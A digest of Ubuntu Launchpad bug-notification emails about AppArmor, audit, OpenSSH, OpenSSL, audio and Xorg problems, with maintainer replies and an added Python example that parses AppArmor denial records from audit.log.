[Touch-packages] [Bug 1117804] Re: ausearch doesn't show AppArmor denial messages
As far as I know, no one has made an effort to try to improve the situation lately. There's some discussion at https://lists.ubuntu.com/archives/apparmor/2024-February/013091.html that may be enlightening, if not encouraging.

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to audit in Ubuntu.
https://bugs.launchpad.net/bugs/1117804

Title: ausearch doesn't show AppArmor denial messages

Status in AppArmor: Confirmed
Status in audit package in Ubuntu: Confirmed
Status in linux package in Ubuntu: Incomplete

Bug description:
  The following command should display all AVC denials:

  ausearch -m avc

  However, it doesn't work with AppArmor denials. Here's a quick test case to generate a denial, search for it with ausearch, and see that no messages are displayed:

  $ aa-exec -p /usr/sbin/tcpdump cat /proc/self/attr/current
  cat: /proc/self/attr/current: Permission denied
  $ sudo ausearch -m avc -c cat

  ausearch claims that there are no matches, but there's a matching audit message if you look in audit.log:

  type=AVC msg=audit(1360193426.539:64): apparmor="DENIED" operation="open" parent=8253 profile="/usr/sbin/tcpdump" name="/proc/8485/attr/current" pid=8485 comm="cat" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000

To manage notifications about this bug go to:
https://bugs.launchpad.net/apparmor/+bug/1117804/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
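Added example, not part of the original message or of the audit or AppArmor projects: while `ausearch -m avc` misses these records, AppArmor denials can be pulled straight from audit.log text by parsing the key=value fields of the record format quoted in the bug description. It assumes that `name`, `comm` and `profile` follow the audit "untrusted string" convention (quoted when printable, bare hex otherwise); every sample line except the first is constructed.

```python
import re

# audit.log record header: type=AVC msg=audit(<epoch>.<ms>:<serial>): <fields>
HEADER = re.compile(r'^type=(\S+) msg=audit\((\d+\.\d+):(\d+)\):\s*(.*)$')
# A field is key="quoted value" or key=bare_token.
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
HEX = re.compile(r'(?:[0-9A-Fa-f]{2})+')
# Assumption: these fields are logged as audit "untrusted strings", i.e.
# quoted when printable, and as bare hex when they contain spaces, quotes
# or control characters.
UNTRUSTED_FIELDS = {"name", "comm", "profile"}


def decode_value(key, raw):
    """Strip quotes, or hex-decode a bare value of an untrusted-string field."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1]
    if key in UNTRUSTED_FIELDS and HEX.fullmatch(raw):
        return bytes.fromhex(raw).decode("utf-8", "replace")
    return raw


def parse_record(line):
    """Parse one audit.log line into type, time, serial and a field dict."""
    m = HEADER.match(line.strip())
    if m is None:
        return None
    rec_type, stamp, serial, rest = m.groups()
    fields = {k: decode_value(k, v) for k, v in FIELD.findall(rest)}
    return {"type": rec_type, "time": float(stamp),
            "serial": int(serial), "fields": fields}


def apparmor_denials(lines, comm=None):
    """Return AVC records carrying apparmor="DENIED", optionally for one comm."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if rec is None or rec["type"] != "AVC":
            continue
        if rec["fields"].get("apparmor") != "DENIED":
            continue  # SELinux AVCs and complain-mode ("ALLOWED") records
        if comm is not None and rec["fields"].get("comm") != comm:
            continue
        hits.append(rec)
    return hits


SAMPLE_LOG = [
    # The record quoted in the bug description.
    'type=AVC msg=audit(1360193426.539:64): apparmor="DENIED" operation="open" '
    'parent=8253 profile="/usr/sbin/tcpdump" name="/proc/8485/attr/current" '
    'pid=8485 comm="cat" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000',
    # Constructed: a path containing a space is logged as bare hex.
    'type=AVC msg=audit(1360193500.101:71): apparmor="DENIED" operation="open" '
    'profile="/usr/sbin/tcpdump" name=' + b"/tmp/my file".hex().upper() +
    ' pid=8490 comm="cat" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000',
    # Constructed: complain-mode record, not a denial.
    'type=AVC msg=audit(1360193510.200:72): apparmor="ALLOWED" operation="open" '
    'profile="/usr/sbin/tcpdump" name="/etc/hosts" pid=8491 comm="cat" '
    'requested_mask="r" denied_mask="r" fsuid=1000 ouid=0',
    # Constructed: SELinux-style AVC without an apparmor= field.
    'type=AVC msg=audit(1360193600.000:80): avc:  denied  { read } for  pid=9000 '
    'comm="cat" name="shadow" dev="sda1" ino=42 tclass=file',
    # Constructed: AppArmor denial for a different command.
    'type=AVC msg=audit(1360193700.250:91): apparmor="DENIED" operation="create" '
    'profile="/usr/sbin/tcpdump" pid=9100 comm="ping" family="inet" sock_type="raw"',
]

if __name__ == "__main__":
    for rec in apparmor_denials(SAMPLE_LOG, comm="cat"):
        f = rec["fields"]
        print(rec["serial"], f["profile"], f["operation"], f.get("name"))
```
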
[Touch-packages] [Bug 2049402] Re: sshd doesn't properly disable KbdInteractiveAuthentication
** Information type changed from Private Security to Public Security

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/2049402

Title: sshd doesn't properly disable KbdInteractiveAuthentication

Status in openssh package in Ubuntu: Incomplete

Bug description:
  On 22.04 in

  OpenSSH_8.9p1 Ubuntu-3ubuntu0.6, OpenSSL 3.0.2 15 Mar 2022

  setting KbdInteractiveAuthentication=no in sshd_config does not disable keyboard-interactive authentication.

  After updating (and restarting the sshd service) `sshd -T` still reports `kbdinteractiveauthentication yes`

  attempts to connect to sshd also allow keyboard-interactive authentication.

  Possibly related to https://bugs.archlinux.org/task/71941
[Touch-packages] [Bug 2046844] Re: AppArmor user namespace creation restrictions cause many applications to crash with SIGTRAP
Scarlett, Simon and I had discussed preparing a small program that could prepare a wrapper profile: given a path to an appimage, it could emit a small profile to /etc/apparmor.d/ for the file, with the right attachment path and then load the profile.

As I understand our new strategy, it would probably also have to include whatever capabilities that appimage uses as part of setting up the new namespaces -- ideally, it'd be the same capabilities from appimage to appimage.

If there's some reasonable restraints on appimages, like using XDG_SOMETHING for user data storage, that might be nice, too. But that's harder to do.

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2046844

Title: AppArmor user namespace creation restrictions cause many applications to crash with SIGTRAP

Status in akregator package in Ubuntu: Fix Released
Status in angelfish package in Ubuntu: In Progress
Status in apparmor package in Ubuntu: Confirmed
Status in bubblewrap package in Ubuntu: Confirmed
Status in cantor package in Ubuntu: Fix Released
Status in devhelp package in Ubuntu: Confirmed
Status in digikam package in Ubuntu: Fix Released
Status in epiphany-browser package in Ubuntu: Confirmed
Status in evolution package in Ubuntu: Confirmed
Status in falkon package in Ubuntu: Fix Released
Status in freecad package in Ubuntu: Confirmed
Status in ghostwriter package in Ubuntu: Fix Released
Status in gnome-packagekit package in Ubuntu: Confirmed
Status in goldendict-webengine package in Ubuntu: Confirmed
Status in kalgebra package in Ubuntu: Fix Released
Status in kchmviewer package in Ubuntu: Confirmed
Status in kdeplasma-addons package in Ubuntu: Confirmed
Status in kgeotag package in Ubuntu: In Progress
Status in kiwix package in Ubuntu: Confirmed
Status in kmail package in Ubuntu: Fix Released
Status in konqueror package in Ubuntu: Fix Released
Status in kontact package in Ubuntu: Fix Released
Status in marble package in Ubuntu: Fix Released
Status in notepadqq package in Ubuntu: Confirmed
Status in opam package in Ubuntu: Confirmed
Status in pageedit package in Ubuntu: Confirmed
Status in plasma-desktop package in Ubuntu: Confirmed
Status in plasma-welcome package in Ubuntu: In Progress
Status in privacybrowser package in Ubuntu: Confirmed
Status in qmapshack package in Ubuntu: Confirmed
Status in qutebrowser package in Ubuntu: Confirmed
Status in rssguard package in Ubuntu: Confirmed
Status in steam package in Ubuntu: Confirmed
Status in supercollider package in Ubuntu: Confirmed
Status in tellico package in Ubuntu: Fix Released

Bug description:
  Hi, I run Ubuntu development branch 24.04 and I have a problem with Epiphany browser 45.1-1 (Gnome Web): program doesn't launch, and I get this error

  $ epiphany
  bwrap: Creating new namespace failed: Permission denied

  ** (epiphany:12085): ERROR **: 14:44:35.023: Failed to fully launch dbus-proxy: Le processus fils s’est terminé avec le code 1
  Trappe pour point d'arrêt et de trace (core dumped)

  $ epiphany
  bwrap: Creating new namespace failed: Permission denied

  ** (epiphany:30878): ERROR **: 22:22:26.926: Failed to fully launch dbus-proxy: Le processus fils s’est terminé avec le code 1
  Trappe pour point d'arrêt et de trace (core dumped)

  Thanks for your help!
[Touch-packages] [Bug 2055135] Re: [CREF-XX, Conexant SN6140, Black Headphone Out, Left] No sound at all
I suggest talking with the virtualbox devs:

[4.040754] UBSAN: array-index-out-of-bounds in /tmp/vbox.0/common/log/log.c:1791:41

It may or may not be related to your audio issues, but it can't be good.

Thanks

** Information type changed from Private Security to Public

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to alsa-driver in Ubuntu.
https://bugs.launchpad.net/bugs/2055135

Title: [CREF-XX, Conexant SN6140, Black Headphone Out, Left] No sound at all

Status in alsa-driver package in Ubuntu: New

Bug description:
  ubuntu-bug -s audio

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: alsa-base 1.0.25+dfsg-0ubuntu7
  ProcVersionSignature: Ubuntu 6.5.0-21.21~22.04.1-generic 6.5.8
  Uname: Linux 6.5.0-21-generic x86_64
  ApportVersion: 2.20.11-0ubuntu82.5
  Architecture: amd64
  AudioDevicesInUse:
   USERPID ACCESS COMMAND
   /dev/snd/controlC0: ronalp 2069 F pulseaudio
   /dev/snd/pcmC0D0p: ronalp 2069 F...m pulseaudio
  CasperMD5CheckResult: pass
  CurrentDesktop: ubuntu:GNOME
  Date: Tue Feb 27 16:55:13 2024
  InstallationDate: Installed on 2024-02-27 (0 days ago)
  InstallationMedia: Ubuntu 22.04.4 LTS "Jammy Jellyfish" - Release amd64 (20240220)
  PackageArchitecture: all
  SourcePackage: alsa-driver
  Symptom: audio
  Symptom_AlsaPlaybackTest: ALSA playback test through plughw:sofhdadsp failed
  Symptom_Card: sof-hda-dsp - sof-hda-dsp
  Symptom_DevicesInUse:
   USERPID ACCESS COMMAND
   /dev/snd/controlC0: ronalp 2069 F pulseaudio
   /dev/snd/pcmC0D0p: ronalp 2069 F...m pulseaudio
  Symptom_Jack: Black Headphone Out, Left
  Symptom_Type: No sound at all
  Title: [CREF-XX, Conexant SN6140, Black Headphone Out, Left] No sound at all
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 08/11/2023
  dmi.bios.release: 1.24
  dmi.bios.vendor: HUAWEI
  dmi.bios.version: 1.24
  dmi.board.asset.tag: N/A
  dmi.board.name: CREF-XX-PCB
  dmi.board.vendor: HUAWEI
  dmi.board.version: M1010
  dmi.chassis.asset.tag: N/A
  dmi.chassis.type: 10
  dmi.chassis.vendor: HUAWEI
  dmi.chassis.version: M1010
  dmi.ec.firmware.release: 1.24
  dmi.modalias: dmi:bvnHUAWEI:bvr1.24:bd08/11/2023:br1.24:efr1.24:svnHUAWEI:pnCREF-XX:pvrM1010:rvnHUAWEI:rnCREF-XX-PCB:rvrM1010:cvnHUAWEI:ct10:cvrM1010:skuC233:
  dmi.product.family: MateBook
  dmi.product.name: CREF-XX
  dmi.product.sku: C233
  dmi.product.version: M1010
  dmi.sys.vendor: HUAWEI
[Touch-packages] [Bug 2055226] Re: mount option `users` blocks ntfs to mount
Hello, thanks for the report; note that the fstab(5) and mount(8) man pages both say "user", singular, not "users", plural. That's probably why your mount command didn't work when run as a user.

I don't know about the gio or udisksctl tool errors, I'm unfamiliar with their operation. Maybe they were also looking for "user"?

Thanks

** Information type changed from Private Security to Public

** Changed in: util-linux (Ubuntu)
       Status: New => Incomplete

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to util-linux in Ubuntu.
https://bugs.launchpad.net/bugs/2055226

Title: mount option `users` blocks ntfs to mount

Status in util-linux package in Ubuntu: Incomplete

Bug description:
  /etc/fstab:
  # /media/Sicherung was on /dev/sda7 during installation
  UUID=2510AA16624BB80C /media/Sicherung ntfs defaults,users,noauto,windows_names,hide_dot_files 0 0

  $ gio mount -d /dev/sda7
  gio: /dev/sda7: Error mounting system-managed device /dev/sda7: Unknown error when mounting /media/Sicherung

  $ udisksctl mount -b /dev/sda7
  Error mounting /dev/sda7: GDBus.Error:org.freedesktop.UDisks2.Error.Failed: Error mounting system-managed device /dev/sda7: Unknown error when mounting /media/Sicherung

  $ journalctl -b 0 -u udisks2.service
  Feb 27 23:48:51 T500 udisksd[10478]: Error opening read-only '/dev/sda7': Keine Berechtigung
  Feb 27 23:48:51 T500 udisksd[10478]: Failed to mount '/dev/sda7': Keine Berechtigung
  Feb 27 23:48:51 T500 udisksd[10478]: Please check '/dev/sda7' and the ntfs-3g binary permissions,
  Feb 27 23:48:51 T500 udisksd[10478]: and the mounting user ID. More explanation is provided at
  Feb 27 23:48:51 T500 udisksd[10478]: https://github.com/tuxera/ntfs-3g/wiki/NTFS-3G-FAQ

  This worked fine until Ubuntu 20.04, but since 22.04 I have these errors.

  Additionally, mount option `users` does not, what it should do:

  $ LC_ALL=C mount /media/Sicherung
  Error opening read-only '/dev/sda7': Permission denied
  Failed to mount '/dev/sda7': Permission denied
  Please check '/dev/sda7' and the ntfs-3g binary permissions,
  and the mounting user ID. More explanation is provided at
  https://github.com/tuxera/ntfs-3g/wiki/NTFS-3G-FAQ

  When removing `users` from /etc/fstab, it works fine:

  $ gio mount -d /dev/sda7
  $ LC_ALL=C journalctl -b 0 -u udisks2.service
  Feb 28 00:05:31 T500 ntfs-3g[10977]: Version 2021.8.22 integrated FUSE 28
  Feb 28 00:05:31 T500 ntfs-3g[10977]: Mounted /dev/sda7 (Read-Write, label "Sicherung", NTFS 3.1)
  Feb 28 00:05:31 T500 ntfs-3g[10977]: Cmdline options: rw,windows_names,hide_dot_files
  Feb 28 00:05:31 T500 ntfs-3g[10977]: Mount options: allow_other,nonempty,relatime,rw,fsname=/dev/sda7,blkdev,blksize=4096
  Feb 28 00:05:31 T500 ntfs-3g[10977]: Ownership and permissions disabled, configuration type 7
  Feb 28 00:05:31 T500 udisksd[583]: Mounted /dev/sda7 (system) at /media/Sicherung on behalf of uid 1000

  So it seems, that option `users` virtually effectuates the opposite, than it is supposed to do.
[Touch-packages] [Bug 2055521] Re: Xorg freeze
Hello, thanks for the bug report. I suggest taking your dmesg output (from CurrentDmesg.txt) to the virtualbox developers, it looks very unhappy.

Thanks

** Information type changed from Private Security to Public

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/2055521

Title: Xorg freeze

Status in xorg package in Ubuntu: New

Bug description:
  System is freeze after opening browsers

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: xorg 1:7.7+23ubuntu2
  ProcVersionSignature: Ubuntu 6.5.0-21.21~22.04.1-generic 6.5.8
  Uname: Linux 6.5.0-21-generic x86_64
  ApportVersion: 2.20.11-0ubuntu82.5
  Architecture: amd64
  BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log'
  CasperMD5CheckResult: pass
  CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins'
  CompositorRunning: None
  CurrentDesktop: ubuntu:GNOME
  Date: Fri Mar 1 11:59:12 2024
  DistUpgraded: Fresh install
  DistroCodename: jammy
  DistroVariant: ubuntu
  ExtraDebuggingInterest: No
  GraphicsCard:
   Intel Corporation TigerLake-LP GT2 [Iris Xe Graphics] [8086:9a49] (rev 01) (prog-if 00 [VGA controller])
   Subsystem: Dell TigerLake-LP GT2 [Iris Xe Graphics] [1028:0ab0]
   Subsystem: Dell GP107M [GeForce MX350] [1028:0ab0]
  InstallationDate: Installed on 2023-12-11 (80 days ago)
  InstallationMedia: Ubuntu 22.04.3 LTS "Jammy Jellyfish" - Release amd64 (20230807.2)
  Lsusb:
   Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
   Bus 001 Device 003: ID 0c45:6730 Microdia Integrated_Webcam_HD
   Bus 001 Device 004: ID 0bda:c829 Realtek Semiconductor Corp. Bluetooth Radio
   Bus 001 Device 002: ID 3554:fc03 CX 2.4G Receiver
   Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
  MachineType: Dell Inc. Inspiron 15 3511
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-6.5.0-21-generic root=UUID=400f7ddd-5dab-4879-8016-60995117717f ro quiet splash vt.handoff=7
  SourcePackage: xorg
  Symptom: display
  Title: Xorg freeze
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 12/19/2023
  dmi.bios.release: 1.26
  dmi.bios.vendor: Dell Inc.
  dmi.bios.version: 1.26.0
  dmi.board.name: 0YX04V
  dmi.board.vendor: Dell Inc.
  dmi.board.version: A00
  dmi.chassis.type: 10
  dmi.chassis.vendor: Dell Inc.
  dmi.modalias: dmi:bvnDellInc.:bvr1.26.0:bd12/19/2023:br1.26:svnDellInc.:pnInspiron153511:pvr:rvnDellInc.:rn0YX04V:rvrA00:cvnDellInc.:ct10:cvr:sku0AB0:
  dmi.product.family: Inspiron
  dmi.product.name: Inspiron 15 3511
  dmi.product.sku: 0AB0
  dmi.sys.vendor: Dell Inc.
  version.compiz: compiz N/A
  version.libdrm2: libdrm2 2.4.113-2~ubuntu0.22.04.1
  version.libgl1-mesa-dri: libgl1-mesa-dri 23.2.1-1ubuntu3.1~22.04.2
  version.libgl1-mesa-glx: libgl1-mesa-glx N/A
  version.xserver-xorg-core: xserver-xorg-core 2:21.1.4-2ubuntu1.7~22.04.8
  version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A
  version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2ubuntu1
  version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20210115-1
  version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-2build1
[Touch-packages] [Bug 2059367] Re: SSH-RSA not supported for Self-SSH in Ubuntu 22.04 FIPS
Hello Arunaav, I'm curious if you could double-check the testing environment to make sure the user accounts are as you expected?

  chmod 0600 /home/core/.ssh/authorized_keys
  ssh -i .ssh/id_rsa onprem_shell@10.14.169.25
  ssh -v user@10.14.169.25
  debug1: identity file /root/.ssh/id_rsa type -1

There's usernames 'core', 'onprem_shell', 'user', and 'root' in play here, and I think it'd be extraordinarily easy to perhaps use sudo or another privilege changing tool in such a way that it is using the wrong private key or the wrong authorized_keys file, etc.

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/2059367

Title: SSH-RSA not supported for Self-SSH in Ubuntu 22.04 FIPS

Status in openssh package in Ubuntu: New

Bug description:
  On a FIPS Enabled Ubuntu 22.04 kernel, we are seeing an issue with self-ssh.

  We created a key with the following steps:

  touch /home/core/.ssh/known_hosts
  ssh-keygen -q -t rsa -f /home/core/.ssh/id_rsa -N '' > /dev/null
  cp /home/core/.ssh/id_rsa.pub /home/core/.ssh/authorized_keys
  chmod 0600 /home/core/.ssh/id_rsa
  chmod 0600 /home/core/.ssh/authorized_keys

  When we try to do a self ssh with the key, the following happens:

  ssh -i .ssh/id_rsa onprem_shell@10.14.169.25
  Connection closed by 10.14.169.25 port 22

  FIPS status:

  cat /proc/sys/crypto/fips_enabled
  1

  PFB, the ssh dump:

  ssh -v user@10.14.169.25
  OpenSSH_8.9p1 Ubuntu-3ubuntu0.6+Fips1, OpenSSL 3.0.2 15 Mar 2022
  debug1: Reading configuration data /etc/ssh/ssh_config
  debug1: /etc/ssh/ssh_config line 19: include /etc/ssh/ssh_config.d/*.conf matched no files
  debug1: /etc/ssh/ssh_config line 21: Applying options for *
  debug1: FIPS mode initialized
  debug1: Connecting to 10.14.169.25 [10.14.169.25] port 22.
  debug1: Connection established.
  debug1: identity file /root/.ssh/id_rsa type -1
  debug1: identity file /root/.ssh/id_rsa-cert type -1
  debug1: identity file /root/.ssh/id_ecdsa type -1
  debug1: identity file /root/.ssh/id_ecdsa-cert type -1
  debug1: identity file /root/.ssh/id_ecdsa_sk type -1
  debug1: identity file /root/.ssh/id_ecdsa_sk-cert type -1
  debug1: identity file /root/.ssh/id_ed25519 type -1
  debug1: identity file /root/.ssh/id_ed25519-cert type -1
  debug1: identity file /root/.ssh/id_ed25519_sk type -1
  debug1: identity file /root/.ssh/id_ed25519_sk-cert type -1
  debug1: identity file /root/.ssh/id_xmss type -1
  debug1: identity file /root/.ssh/id_xmss-cert type -1
  debug1: identity file /root/.ssh/id_dsa type -1
  debug1: identity file /root/.ssh/id_dsa-cert type -1
  debug1: Local version string SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6+Fips1
  debug1: Remote protocol version 2.0, remote software version OpenSSH_8.9p1 Ubuntu-3ubuntu0.6+Fips1
  debug1: compat_banner: match: OpenSSH_8.9p1 Ubuntu-3ubuntu0.6+Fips1 pat OpenSSH* compat 0x0400
  debug1: Authenticating to 10.14.169.25:22 as 'user'
  debug1: SSH2_MSG_KEXINIT sent
  debug1: SSH2_MSG_KEXINIT received
  debug1: kex: algorithm: ecdh-sha2-nistp256
  debug1: kex: host key algorithm: ssh-rsa
  debug1: kex: server->client cipher: aes128-cbc MAC: hmac-sha1 compression: none
  debug1: kex: client->server cipher: aes128-cbc MAC: hmac-sha1 compression: none
  debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
  Connection closed by 10.14.169.25 port 22

  hostname -i
  10.14.169.25

  Please note that SSH onto other hosts (both FIPS and non-FIPS) works.

  The only workaround that we have found has been removing the ssh-rsa entry from “HostKeyAlgorithms” in “etc/ssh/sshd_config” and restarting the SSH service.

  This issue has neither been encountered in the Ubuntu 18.04 FIPS nor Ubuntu 20.04 FIPS.
[Touch-packages] [Bug 2057943] Re: Can't disable or modify snap package apparmor rules
I'm adding the snapd package as it feels plausible that snapd could make this task easier, too.

** Also affects: snapd (Ubuntu)
   Importance: Undecided
       Status: New

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2057943

Title: Can't disable or modify snap package apparmor rules

Status in apparmor package in Ubuntu: New
Status in snapd package in Ubuntu: New

Bug description:
  On Ubuntu 20.04 (and probably 22.04 and greater), it is impossible to disable snap chromium apparmor rules:

  root@{HOSTNAME}:~# aa-complain snap.chromium.hook.configure
  Can't find chromium.hook.configure in the system path list. If the name of the application is correct, please run 'which snap.chromium.hook.configure' as a user with correct PATH environment set up in order to find the fully-qualified path and use the full path as parameter.

  root@{HOSTNAME}:~# aa-complain snap.chromium.chromedriver -d /var/lib/snapd/apparmor/profiles
  ERROR: Include file /var/lib/snapd/apparmor/profiles/tunables/global not found

  root@{HOSTNAME}:~# aa-complain snap.chromium.chromium -d /var/lib/snapd/apparmor/profiles
  ERROR: Include file /var/lib/snapd/apparmor/profiles/tunables/global not found

  root@{HOSTNAME}:~# aa-complain snap.chromium.hook.configure -d /var/lib/snapd/apparmor/profiles
  ERROR: Include file /var/lib/snapd/apparmor/profiles/tunables/global not found

  It seems like no one has an answer on how these overly restricted rules can be disabled:

  https://askubuntu.com/questions/1267980/how-to-disable-apparmor-for-chromium-snap-ubuntu-20-04
  https://ubuntuforums.org/showthread.php?t=2410550
  https://ubuntuforums.org/showthread.php?t=2449022
  https://answers.launchpad.net/ubuntu/+source/apparmor/+question/701036

  So I just got rid of apparmor which doesn't seem like the solution I was after, but it works great now:

  sudo systemctl stop apparmor
  sudo systemctl disable apparmor

  Please give us a way to modify (and keep the rules permanently modified even after snap updates) snap apparmor rules.

  Thank you!
[Touch-packages] [Bug 2058690] Re: aa-easyprof: allow mmap and link from easyprof generated profiles
The 'm' permission shouldn't be a default; restricting what the CPU will execute is a very useful security mitigation.

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2058690

Title: aa-easyprof: allow mmap and link from easyprof generated profiles

Status in apparmor package in Ubuntu: New

Bug description:
  Currently, an easyprof-generated profile will list the reads with `rk` and the writes as `rwk`. With recent Qt, this breaks because newer Qt versions use hard-linking of temporary files to perform atomic writes. Also, `rk` doesn't allow mmap()'ing shared library for execution.

  We at UBports are carrying a patch in Ubuntu Touch which changes the read rules to `mrk` and write rules to `mrwkl`, and are upstreaming this patch at [1]. When the MR is merged, I would like this patch to be included in Ubuntu 24.04, so that Ubuntu Touch doesn't have to package AppArmor separately from Ubuntu.

  If we agree that we want this patch, I can provide an MR on Salsa.

  [1] https://gitlab.com/apparmor/apparmor/-/merge_requests/1189
[Touch-packages] [Bug 2061869] Re: Snaps unable to connect to network under linux-lowlatency 6.8.0-25.25.3
*** This bug is a duplicate of bug 2061851 ***
    https://bugs.launchpad.net/bugs/2061851

** This bug has been marked a duplicate of bug 2061851
   linux-gcp 6.8.0-1005.5 (+ others) Noble kernel regression with new apparmor profiles/features

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2061869

Title: Snaps unable to connect to network under linux-lowlatency 6.8.0-25.25.3

Status in apparmor package in Ubuntu: Confirmed
Status in linux-lowlatency package in Ubuntu: Confirmed

Bug description:
  After upgrading to linux-lowlatency 6.8.0-25, suddenly snaps can no longer connect to network. I tried downgrading snapd from edge, still no connectivity. Only solution was to downgrade back to 6.8.0-7.

  I'll also add apparmor in case this is an apparmor issue as well.

  Marking as "critical" priority as this affects all installs of Ubuntu Studio and affects Firefox and Thunderbird.
[Touch-packages] [Bug 2063271] Re: Illegal opcode in libssl
** Package changed: openssh (Ubuntu) => openssl (Ubuntu)

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/2063271

Title: Illegal opcode in libssl

Status in openssl package in Ubuntu: New

Bug description:
  Many programs using openssl now fail, typically with messages such as

  Illegal instruction (core dumped)

  This seems to be a serious error, since it affects, for example, update-manager. Since this makes it harder to get security updates, I would also consider it a security vulnerability.

  The issue seems to be that openssl seems to be an attempt to use an illegal opcode. A few sample entries in /var/log/syslog are:

  Apr 21 19:16:39 einstein kernel: [495465.431588] traps: update-manager[396881] trap invalid opcode ip:740964b8ac6b sp:7409552125b0 error:0 in libssl.so.3[740964b7a000+5b000]
  Apr 21 19:16:55 einstein kernel: [495482.104658] traps: python3[396949] trap invalid opcode ip:73607be8ac6b sp:736074d8d5b0 error:0 in libssl.so.3[73607be7a000+5b000]
  Apr 21 19:40:05 einstein kernel: [496871.653271] traps: chrome-gnome-sh[397293] trap invalid opcode ip:79432ffa7c6b sp:7ffd6bc03e70 error:0 in libssl.so.3[79432ff97000+5b000]
  Apr 22 16:23:08 einstein kernel: [501744.765118] traps: check-new-relea[400397] trap invalid opcode ip:797c7cc8ac6b sp:797c6cace5b0 error:0 in libssl.so.3[797c7cc7a000+5b000]
  Apr 23 15:08:03 einstein kernel: [518701.050526] traps: wget[443588] trap invalid opcode ip:73a8b2eb4c6b sp:7ffc04918740 error:0 in libssl.so.3[73a8b2ea4000+5b000]
  Apr 23 15:12:55 einstein kernel: [518992.493020] traps: curl[443851] trap invalid opcode ip:7e4e3951dc6b sp:7ffc804d2ed0 error:0 in libssl.so.3[7e4e3950d000+5b000]
  Apr 23 15:13:32 einstein kernel: [519029.181422] traps: apport-gtk[04] trap invalid opcode ip:7039180f5c6b sp:703902bfaad0 error:0 in libssl.so.3[7039180e5000+5b000]

  This bug report itself had to be submitted manually since ubuntu-bug now itself fails.

  lsb_release -rd reports:

  Description: Ubuntu 22.04.4 LTS
  Release: 22.04

  apt-cache policy openssl reports:

  openssl:
    Installed: 3.0.2-0ubuntu1.15
    Candidate: 3.0.2-0ubuntu1.15
    Version table:
   *** 3.0.2-0ubuntu1.15 500
          500 http://us.archive.ubuntu.com/ubuntu jammy-updates/main amd64 Packages
          500 http://security.ubuntu.com/ubuntu jammy-security/main amd64 Packages
          100 /var/lib/dpkg/status
       3.0.2-0ubuntu1 500
          500 http://us.archive.ubuntu.com/ubuntu jammy/main amd64 Packages

  /proc/version for my computer gives

  Linux version 6.5.0-28-generic (buildd@lcy02-amd64-098) (x86_64-linux-gnu-gcc-12 (Ubuntu 12.3.0-1ubuntu1~22.04) 12.3.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #29~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr 4 14:39:20 UTC 2

  /proc/cpuinfo for my computer starts

  processor : 0
  vendor_id : GenuineIntel
  cpu family: 6
  model : 78
  model name: Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz
  stepping : 3
  microcode : 0xf0
  cpu MHz : 500.018
  cache size: 4096 KB
  physical id : 0
  siblings : 4
  core id : 0
  cpu cores : 2
  apicid: 0
  initial apicid: 0
  fpu : yes
  fpu_exception : yes
  cpuid level : 22
  wp: yes
